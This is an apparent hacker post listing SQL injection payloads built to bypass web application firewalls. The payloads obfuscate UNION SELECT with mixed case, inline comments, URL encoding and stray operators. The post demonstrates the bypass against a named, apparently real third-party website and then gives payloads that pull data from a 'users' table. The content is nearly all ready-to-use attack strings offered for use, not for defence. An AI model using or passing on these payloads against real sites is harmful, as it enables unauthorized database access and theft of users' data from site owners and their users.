Bypass WAF SQLi (HOT 2017)

1. The Methods
2. .
3. id=1.unioN/**/distinct%20%73eleCt""a
4. id=1%.0unioN/**/distinct%20%73eleCt+-!~
5. id=1%""unioN/**/distinct%20%73eleCt@$%
6. id=1%''unioN/**/distinct%20%73eleCt@%C0%
7. id=1-.0unioN/**/distinct%20%73eleCt@%C0/
8. id=1=\NunioN/**/distinct%20%73eleCt@%FF|
9. id=1<0.unioN/**/distinct%20%73eleCt@=
10. id=1>0.unioN/**/distinct%20%73eleCt~.
11. id=1e0unioN/**/distinct%20%73eleCt""$
12. id=1^0.unioN/**/distinct%20%73eleCt!~
13. id=1|""unioN/**/distinct%20%73eleCt\N$
14. id=1|''unioN/**/distinct%20%73eleCt\N%FF
15. id=1|.0unioN/**/distinct%20%73eleCt!@
16. id=1|\NunioN/**/distinct%20%73eleCt""/
17. .
18. How it Work
19. .
20. http://www.atrium.com.pk/Map.php?ID=4 ' and 0 union select 1,2,3,4,5,6,7,8-- -
21. .
22. WAF >>> Internal Server Error
23. .
24. http://www.atrium.com.pk/Map.php?ID=4 ' and 0.unioN/**/distinct%20%73eleCt""a1,2,3,4,5,6,7,8-- -
25. .
26. More >>>>
27. .
28. .
29. id=1.unioN/**/distinct %73eleCt""a1,2,3``from.%20users``limit 0,1-- -
30. id=1%.0unioN/**/distinct %73eleCt+-!~a1,2,3|''from%20.users-- -
31. id=1%""unioN/**/distinct %73eleCt@$%a1,2,3|""from users-- -
32. id=1%''unioN/**/distinct %73eleCt@%C0%a1,2,3^""from users-- -
33. id=1-.0unioN/**/distinct %73eleCt@%C0/a1,2,3.1from users-- -
34. id=1=\NunioN/**/distinct %73eleCt@%FF|a1,2,3""from users-- -
35. id=1<0.unioN/**/distinct %73eleCt@=a1,2,3''from users-- -
36. id=1>0.unioN/**/distinct %73eleCt~.a1,2,3 from users-- -
37. id=1e0unioN/**/distinct %73eleCt""$a1,2,3 from users-- -
38. id=1^0.unioN/**/distinct %73eleCt!~a1,2,3 from users-- -
39. id=1|""unioN/**/distinct %73eleCt\N$a1,2,3 from users-- -
40. id=1|''unioN/**/distinct %73eleCt\N%FFa1,2,3 from users-- -
41. id=1|.0unioN/**/distinct %73eleCt!@a1,2,3 from users-- -
42. id=1|\NunioN/**/distinct %73eleCt""/a1,2,3 from users-- -
43.  
44.  
45.  
46. thx for:
47. http://fb.me/Melegy.GHI
48. http://fb.me/programer.shtml